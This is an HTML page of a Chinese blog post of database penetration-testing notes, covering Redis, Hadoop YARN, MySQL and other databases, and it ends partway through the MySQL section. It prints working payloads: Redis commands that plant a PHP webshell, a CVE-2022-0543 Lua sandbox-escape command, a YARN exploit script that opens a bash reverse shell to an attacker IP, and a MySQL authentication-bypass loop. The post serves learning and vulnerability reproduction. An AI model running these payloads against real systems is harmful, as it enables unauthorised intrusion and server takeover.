<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="渗透测试 | Redis渗透 https:&#x2F;&#x2F;www.freebuf.com&#x2F;articles&#x2F;web&#x2F;281161.htmlRedis-未授权访问-CVE-2022-0543 (redis沙盒逃逸) https:&#x2F;&#x2F;blog.csdn.net&#x2F;MateSnake&#x2F;article&#x2F;details&#x2F;138820548InfluxDB JWT未授权漏洞（CVE-2019-20933）复现 https:">
<meta property="og:type" content="article">
<meta property="og:title" content="【Web安全】数据库安全笔记">
<meta property="og:url" content="https://g0dam.github.io/2024/09/30/WebSecurity/database-security/index.html">
<meta property="og:site_name" content="g0dam">
<meta property="og:description" content="渗透测试 | Redis渗透 https:&#x2F;&#x2F;www.freebuf.com&#x2F;articles&#x2F;web&#x2F;281161.htmlRedis-未授权访问-CVE-2022-0543 (redis沙盒逃逸) https:&#x2F;&#x2F;blog.csdn.net&#x2F;MateSnake&#x2F;article&#x2F;details&#x2F;138820548InfluxDB JWT未授权漏洞（CVE-2019-20933）复现 https:">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image.png">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image-1.png">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image-2.png">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image-3.png">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image-4.png">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image-5.png">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image-6.png">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image-7.png">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image-8.png">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image-9.png">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image-10.png">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image-11.png">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image-12.png">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image-13.png">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image-14.png">
<meta property="og:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image-15.png">
<meta property="article:published_time" content="2024-09-30T06:03:10.000Z">
<meta property="article:modified_time" content="2024-09-30T08:28:46.786Z">
<meta property="article:author" content="g0dam">
<meta property="article:tag" content="数据库">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://g0dam.github.io/.io//09/30/WebSecurity/database-security/image.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>【Web安全】数据库安全笔记</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="g0dam" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">Categories</a></li><!--
     --><!--
       --><li><a href="/idea/">Idea</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/g0dam">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/09/27/WebSecurity/apisecurity/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&text=【Web安全】数据库安全笔记"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&title=【Web安全】数据库安全笔记"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&is_video=false&description=【Web安全】数据库安全笔记"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=【Web安全】数据库安全笔记&body=Check out this article: https://g0dam.github.io/2024/09/30/WebSecurity/database-security/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&title=【Web安全】数据库安全笔记"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&title=【Web安全】数据库安全笔记"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&title=【Web安全】数据库安全笔记"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&title=【Web安全】数据库安全笔记"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&name=【Web安全】数据库安全笔记&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&t=【Web安全】数据库安全笔记"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A6%82%E5%86%B5"><span class="toc-number">1.</span> <span class="toc-text">概况</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Redis"><span class="toc-number">2.</span> <span class="toc-text">Redis</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE"><span class="toc-number">2.1.</span> <span class="toc-text">Redis未授权访问</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE-CVE-2022-0543"><span class="toc-number">2.2.</span> <span class="toc-text">未授权访问-CVE-2022-0543</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Hadoop"><span class="toc-number">3.</span> <span class="toc-text">Hadoop</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Mysql"><span class="toc-number">4.</span> <span class="toc-text">Mysql</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2012-2122-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE"><span class="toc-number">4.1.</span> <span class="toc-text">CVE-2012-2122 未授权远程访问</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#InfluxDB"><span class="toc-number">5.</span> <span class="toc-text">InfluxDB</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#H2database-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE"><span class="toc-number">6.</span> <span class="toc-text">H2database 未授权访问</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CouchDB"><span class="toc-number">7.</span> <span class="toc-text">CouchDB</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Couchdb-%E5%9E%82%E7%9B%B4%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2017-12635%EF%BC%89"><span class="toc-number">7.1.</span> <span class="toc-text">Couchdb 垂直权限绕过漏洞（CVE-2017-12635）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Couchdb-%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-CVE-2017-12636"><span class="toc-number">7.2.</span> <span class="toc-text">Couchdb 任意命令执行 CVE-2017-12636</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E4%BF%AE%E6%94%B9-query-servers-%E9%85%8D%E7%BD%AE"><span class="toc-number">7.2.1.</span> <span class="toc-text">1. 修改 query_servers 配置</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-%E8%A7%A6%E5%8F%91%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-number">7.2.2.</span> <span class="toc-text">2. 触发命令执行</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#CouchDB-1-x-%E5%92%8C-2-x-%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="toc-number">7.2.3.</span> <span class="toc-text">CouchDB 1.x 和 2.x 的区别</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ElasticSearch-%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5-RCE-%E6%BC%8F%E6%B4%9E"><span class="toc-number">8.</span> <span class="toc-text">ElasticSearch-文件写入&amp;RCE-漏洞</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        【Web安全】数据库安全笔记
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">g0dam</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-09-30T06:03:10.000Z" class="dt-published" itemprop="datePublished">2024-09-30</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/Web-Security/">Web Security</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/%E6%95%B0%E6%8D%AE%E5%BA%93/" rel="tag">数据库</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>渗透测试 | Redis渗透 <a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/281161.html">https://www.freebuf.com/articles/web/281161.html</a><br>Redis-未授权访问-CVE-2022-0543 (redis沙盒逃逸) <a target="_blank" rel="noopener" href="https://blog.csdn.net/MateSnake/article/details/138820548">https://blog.csdn.net/MateSnake/article/details/138820548</a><br>InfluxDB JWT未授权漏洞（CVE-2019-20933）复现 <a target="_blank" rel="noopener" href="https://www.cnblogs.com/BMCel/p/18025462">https://www.cnblogs.com/BMCel/p/18025462</a><br>数据库安全：InfluxDB 未授权访问-Jwt验证不当 漏洞. <a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_54977781/article/details/134346421">https://blog.csdn.net/weixin_54977781/article/details/134346421</a><br>H2database 未授权访问 vulhub  <a target="_blank" rel="noopener" href="https://blog.csdn.net/c0529/article/details/139624113">https://blog.csdn.net/c0529/article/details/139624113</a><br>深入分析H2数据库控制台中无需身份验证的RCE漏洞 <a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/459941555">https://zhuanlan.zhihu.com/p/459941555</a></p>
<h2 id="概况"><a href="#概况" class="headerlink" title="概况"></a>概况</h2><p>首先整理出一个表格，方便参考：</p>
<table>
<thead>
<tr>
<th>#</th>
<th>数据库</th>
<th>简介</th>
<th>默认端口</th>
<th>特性</th>
<th>已知CVE漏洞</th>
</tr>
</thead>
<tbody><tr>
<td>1</td>
<td>Redis</td>
<td>开源的内存数据结构存储系统，用作数据库、缓存和消息代理。</td>
<td>6379</td>
<td>支持字符串、哈希、列表、集合等多种数据结构。</td>
<td>CVE-2022-0543、CVE-2023-36824、CVE-2023-28856</td>
</tr>
<tr>
<td>2</td>
<td>Hadoop</td>
<td>允许在计算机集群中分布式处理大数据集的框架。</td>
<td>50070 &#x2F; 50075 &#x2F; 50010</td>
<td>存储和处理大量数据的能力。</td>
<td>CVE-2016-5397, CVE-2017-15718</td>
</tr>
<tr>
<td>3</td>
<td>MySQL</td>
<td>开源关系数据库管理系统，以其可靠性和易用性著称。</td>
<td>3306</td>
<td>支持全文搜索、SSL支持、分区和复制等功能。</td>
<td>CVE-2012-2122</td>
</tr>
<tr>
<td>4</td>
<td>InfluxDB</td>
<td>专门设计用于处理高写入和查询负载的时间序列数据库。</td>
<td>8086 &#x2F; 8088</td>
<td>高效处理时间序列数据，支持SQL-like查询语言。</td>
<td>CVE-2019-20933</td>
</tr>
<tr>
<td>5</td>
<td>H2 Database</td>
<td>轻量级开源关系数据库，用Java编写，设计用于嵌入Java应用中。</td>
<td>8082 &#x2F; 9092</td>
<td>支持标准SQL和JDBC API，支持嵌入式和服务器模式，提供强加密。</td>
<td>CVE-2021-23463</td>
</tr>
<tr>
<td>6</td>
<td>CouchDB</td>
<td>使用JSON文档的NoSQL文档数据库，支持HTTP API和JavaScript的MapReduce查询。</td>
<td>5984</td>
<td>支持ACID属性，多版本并发控制，复制提高可扩展性和容错能力。</td>
<td>CVE-2017-12636, CVE-2018-8007</td>
</tr>
<tr>
<td>7</td>
<td>ElasticSearch</td>
<td>基于Lucene库的搜索引擎，提供分布式、多租户能力的全文搜索引擎。</td>
<td>9200 &#x2F; 9300</td>
<td>简单的REST APIs，分布式特性，速度快，可扩展。</td>
<td>CVE-2021-22145, CVE-2018-17246</td>
</tr>
<tr>
<td>8</td>
<td>Oracle</td>
<td>由Oracle公司生产的多模型数据库管理系统。</td>
<td>1521</td>
<td>强大的数据完整性、复杂事务、强安全特性和广泛的数据分析功能。</td>
<td>CVE-2021-35587, CVE-2019-2729</td>
</tr>
<tr>
<td>9</td>
<td>SQL Server</td>
<td>微软开发的关系数据库管理系统。</td>
<td>1433</td>
<td>支持广泛的事务处理、商业智能和分析应用。</td>
<td>CVE-2021-1636, CVE-2017-8517</td>
</tr>
<tr>
<td>10</td>
<td>PostgreSQL</td>
<td>开源关系数据库，以可靠性、功能强大和性能著称。</td>
<td>5432</td>
<td>支持高级SQL标准、JSON、XML，有强大的社区支持。</td>
<td>CVE-2022-1552, CVE-2019-10208、CVE-2019-10164</td>
</tr>
<tr>
<td>11</td>
<td>MongoDB</td>
<td>跨平台的文档导向数据库，使用类JSON的文档，可选模式。</td>
<td>27017</td>
<td>支持临时查询、索引和实时聚合。</td>
<td>CVE-2023-20052, CVE-2021-20329</td>
</tr>
</tbody></table>
<p>具体来说，可以通过报错、端口探测等方式首先确定数据库类型，之后再针对性分析</p>
<h2 id="Redis"><a href="#Redis" class="headerlink" title="Redis"></a>Redis</h2><p>REmote DIctionary Server（Redis）是一个由 Salvatore Sanfilippo写的key-value存储系统。<br>Redis是—个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于內存亦可持久化的日志型、Key-Value数据库，并提供多种语言的APl。它通常被称为数据结构服务器，因为值（value）可以是字符串（String），哈希（Map），列表（List），集合（sets）和有序集合（sorted sets）等类型。从2010年3月15日起，Redis的开发工作由 Mware主持。从2013年5月开始，Redis的开发由 Pivotal赞助。目前最新稳定版本为4.0.8<br>Redis是一个开源的高性能键值数据库。最热门的NoSq数据库之一，也被人们称为数据结构服务器。<br>最大的特点就是 ：快</p>
<ol>
<li>以内存作为数据存储介质，读写数据的效率极高。</li>
<li>储存在 Redis中的数据是持久化的，断电或重启，数据也不会丢失</li>
<li>存储分为内存存储、磁盘存储和log文件。</li>
<li>可以从磁盘重新将数据加载到內存中，也可以通过配置文件对其进行配置，因此，redis才能实现持久化</li>
<li>支持主从模式，可以配置集群，更利于支撑大型的项目。<br>Redis默认端口：6379 sentinel.conf配置器端口为26379</li>
</ol>
<h3 id="Redis未授权访问"><a href="#Redis未授权访问" class="headerlink" title="Redis未授权访问"></a>Redis未授权访问</h3><p>Redis安装后，如果绑定在 0.0.0.0:6379，并且没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有设置密码认证或使用弱口令的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下，利用 Redis 自身的提供的config 命令，可以进行写文件操作，攻击者可以成功将自己的ssh公钥写入目标服务器的 &#x2F;root&#x2F;.ssh 文件夹的authotrized_keys文件中，进而可以使用对应私钥直接使用ssh服务登录目标服务器。<br>常用命令：<br>1.查看信息：info<br>2.删除所有数据库內容：flushable<br>3.刷新数据库：flush<br>4.看所有键：KEYS*，使用 select nun可以查看键值数据。<br>5.设置变量：set test“who am i<br>6.config set dir dirpath设置路径等配置7.config get dir&#x2F;filename获取路径及数据配置信息<br>8.save保存<br>9.get变量，查看变量名称</p>
<p>Redis写入webshell</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">config <span class="built_in">set</span> <span class="built_in">dir</span> /var/www/html/    //切换目录到网站的根目录</span><br><span class="line"><span class="built_in">set</span> x <span class="string">&quot;\n\n\n&lt;?php phpinfo();?&gt;\n\n\n&quot;</span>    //写入恶意代码phpinfo()</span><br><span class="line"><span class="built_in">set</span> xx <span class="string">&quot;\n\n\n&lt;?php @eval(<span class="variable">$_POST</span>[&#x27;1&#x27;]);?&gt;\n\n\n&quot;</span>         //写入一句话木马</span><br><span class="line">config <span class="built_in">set</span> dbfilename a001.php      //磁盘中生成木马文件a001.php</span><br><span class="line">save        //进行保存</span><br></pre></td></tr></table></figure>
<h3 id="未授权访问-CVE-2022-0543"><a href="#未授权访问-CVE-2022-0543" class="headerlink" title="未授权访问-CVE-2022-0543"></a>未授权访问-CVE-2022-0543</h3><p>Redis 存在代码注入漏洞，Redis 支持使用 Lua 脚本来执行复杂的操作。Lua 脚本在 Redis 中运行在一个被称为“沙箱”的环境中，该环境应限制脚本只能执行安全的操作，阻止访问外部系统资源，如文件系统或系统函数。然而，由于 Debian 和 Ubuntu 的打包错误，Lua 沙箱中错误地包含了 package 对象。<br>2.2 &lt;&#x3D; redis &lt; 5.0.13、2.2 &lt;&#x3D; redis &lt; 6.0.15、2.2 &lt;&#x3D; redis &lt; 6.2.5，首先需要能够成功登陆redis，之后使用下面的payload</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">eval</span> <span class="string">&#x27;local io_l = package.loadlib(&quot;/usr/lib/x86_64-linux-gnu/liblua5.1.so.0&quot;, &quot;luaopen_io&quot;); local io = io_l(); local f = io.popen(&quot;whoami&quot;, &quot;r&quot;); local res = f:read(&quot;*a&quot;); f:close(); return res&#x27;</span> 0</span><br></pre></td></tr></table></figure>
<p>payload的whoami为可以执行的任意系统命令位置，可以换成id或者pwd等等<br>漏洞原理：<br>因为Debian以及Ubuntu发行版的源在打包Redis时，不慎在Lua沙箱中遗留了一个对象package<br>攻击者可通过package中的loadlib函数来加载动态链接库&#x2F;usr&#x2F;lib&#x2F;x86_64-linux-gnu&#x2F;liblua5.1.so.0中的函数luaopen_io，在Lua中执行这个导出函数，即可获得io库，再使用其执行命令。<br>POC解析：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">local io_l = package.loadlib(&quot;/usr/lib/x86_64-linux-gnu/liblua5.1.so.0&quot;, &quot;luaopen_io&quot;);    // 通过loadlib函数加载动态连接库中的luaopen_io函数，并赋给io_l</span><br><span class="line">local io = io_l();    // 执行io_l()，获取io库</span><br><span class="line">local f = io.popen(&quot;whoami&quot;, &quot;r&quot;);     // 通过io库中的popen来执行命令，并把执行结果返回赋给f</span><br><span class="line">local res = f:read(&quot;*a&quot;);    // 读取f中命令执行的结果内容</span><br><span class="line">f:close();    // 关闭f</span><br><span class="line">return res    // 将读取的结果内容返回</span><br></pre></td></tr></table></figure>

<h2 id="Hadoop"><a href="#Hadoop" class="headerlink" title="Hadoop"></a>Hadoop</h2><p>Hadoop是一个由Apache基金会开发的分布式系统基础架构，主要解决海量数据的存储和分析计算问题。Hadoop的主要用于：</p>
<ul>
<li>分布式存储：通过Hadoop分布式文件系统（HDFS），Hadoop能够存储海量数据，提供高吞吐量的数据访问。</li>
<li>分布式计算：利用MapReduce编程模型，Hadoop能够处理大量数据集，执行并行计算任务，提高数据处理效率。</li>
<li>数据挖掘和分析：Hadoop支持复杂的数据分析和数据挖掘任务，帮助用户从大规模数据集中提取有价值的信息。<br>Hadoop YARN的ResourceManager是集群资源分配和调度的关键，若出现未授权访问漏洞，可能使未认证用户访问或操纵资源，引发数据泄露、资源滥用或服务中断。此类安全问题需及时修复，以保护集群安全。<br>该漏洞涉及版本：hadoop 3.3.0以下,访问&#x2F;cluster&#x2F;apps页面：（该页面存在说明存在未授权访问漏洞）<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">使用以下官方exp反弹shell</span><br><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">target = <span class="string">&#x27;http://127.0.0.1:8088/&#x27;</span></span><br><span class="line">lhost = <span class="string">&#x27;192.168.0.1&#x27;</span> <span class="comment"># put your local host ip here, and listen at port 9999</span></span><br><span class="line"></span><br><span class="line">url = target + <span class="string">&#x27;ws/v1/cluster/apps/new-application&#x27;</span></span><br><span class="line">resp = requests.post(url)</span><br><span class="line">app_id = resp.json()[<span class="string">&#x27;application-id&#x27;</span>]</span><br><span class="line">url = target + <span class="string">&#x27;ws/v1/cluster/apps&#x27;</span></span><br><span class="line">data = &#123;</span><br><span class="line">    <span class="string">&#x27;application-id&#x27;</span>: app_id,</span><br><span class="line">    <span class="string">&#x27;application-name&#x27;</span>: <span class="string">&#x27;get-shell&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;am-container-spec&#x27;</span>: &#123;</span><br><span class="line">        <span class="string">&#x27;commands&#x27;</span>: &#123;</span><br><span class="line">            <span class="string">&#x27;command&#x27;</span>: <span class="string">&#x27;/bin/bash -i &gt;&amp; /dev/tcp/%s/9999 0&gt;&amp;1&#x27;</span> % lhost,</span><br><span class="line">        &#125;,</span><br><span class="line">    &#125;,</span><br><span class="line">    <span class="string">&#x27;application-type&#x27;</span>: <span class="string">&#x27;YARN&#x27;</span>,</span><br><span class="line">&#125;</span><br><span class="line">requests.post(url, json=data)</span><br></pre></td></tr></table></figure>
这段 Python 脚本是一个针对 Hadoop YARN (Yet Another Resource Negotiator) 的漏洞利用（exploit）示例，用于反弹 Shell 到指定的监听器。这个脚本的原理是通过未经授权的 API 访问向 YARN 提交一个恶意应用，然后利用 YARN 的应用管理机制来执行任意命令。</li>
</ul>
<ol>
<li><strong>设置目标和监听主机</strong>：<ul>
<li><code>target</code> 设置为 YARN ResourceManager 的 Web 接口。</li>
<li><code>lhost</code> 设置为攻击者的监听 IP 地址，用于接收反弹的 Shell。</li>
</ul>
</li>
<li><strong>请求新应用 ID</strong>：<ul>
<li>脚本首先向 YARN 的 <code>ws/v1/cluster/apps/new-application</code> 发送 POST 请求，这个 API 调用用于获取一个新的应用程序 ID。</li>
<li>响应中包含 <code>application-id</code>，这是后续提交应用时必须使用的。</li>
</ul>
</li>
<li><strong>构造恶意应用数据</strong>：<ul>
<li>接下来，脚本构建一个包含恶意命令的 JSON 数据体。</li>
<li><code>application-id</code> 是从前一步获取的 ID。</li>
<li><code>application-name</code> 可以是任意名称，在这里设置为 ‘get-shell’。</li>
<li><code>am-container-spec</code> 是 YARN 中管理应用生命周期的组件，其中 <code>commands</code> 字段用于定义应用启动时执行的命令。这里的命令是一个典型的反弹 Shell 命令 <code>/bin/bash -i &gt;&amp; /dev/tcp/%s/9999 0&gt;&amp;1</code>，这条命令尝试创建一个到攻击者 <code>lhost</code> 上 9999 端口的反向 TCP 连接。</li>
<li><code>application-type</code> 设置为 ‘YARN’，这指定了应用程序类型。</li>
</ul>
</li>
<li><strong>提交恶意应用并触发执行</strong>：<ul>
<li>最后，脚本将包含恶意数据的 JSON 发送到 <code>ws/v1/cluster/apps</code>，通过 POST 请求实际提交并尝试启动这个应用。</li>
<li>如果 YARN 未正确配置安全控制，这个请求将成功，YARN 将按照提供的恶意命令执行，导致在指定的 IP 和端口上打开一个反向 Shell。</li>
</ul>
</li>
</ol>
<h2 id="Mysql"><a href="#Mysql" class="headerlink" title="Mysql"></a>Mysql</h2><h3 id="CVE-2012-2122-未授权远程访问"><a href="#CVE-2012-2122-未授权远程访问" class="headerlink" title="CVE-2012-2122 未授权远程访问"></a>CVE-2012-2122 未授权远程访问</h3><p>CVE-2012-2122 影响的是 MySQL 5.1.x 版本到 5.1.61，MySQL 5.5.x 版本到 5.5.24，以及某些 5.0 版本。这个漏洞主要影响运行在 Linux、OS X、Solaris 平台的 MySQL 版本，Windows 版本由于认证实现的差异通常不受影响。<br>漏洞的利用相对简单，攻击者可以通过重复尝试使用错误的密码登录，直到由于内存比较的错误导致成功登录。在某些情况下，攻击者可能只需要尝试约 256 次即可成功绕过认证。这种利用方式不需要特别复杂的技术，普通的脚本工具就能完成。</p>
<p>该漏洞源于 MySQL 服务端在验证用户密码时的一个逻辑错误。在 MySQL 中，客户端发送的密码是一个散列值，服务端会将这个散列与期望的散列值进行比较。问题出在比较这两个散列值的函数上（<code>memcmp()</code>），这个函数在某些情况下会由于 CPU 架构的问题错误地返回 0（即认为两个散列值相等），尤其是在 x86 架构的处理器上。<br>POC：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done</span><br></pre></td></tr></table></figure>
<p>在 MySQL 源代码中，漏洞相关的部分主要是 <code>sql/password.c</code> 中的 <code>check_scramble()</code> 函数。问题代码如下：</p>
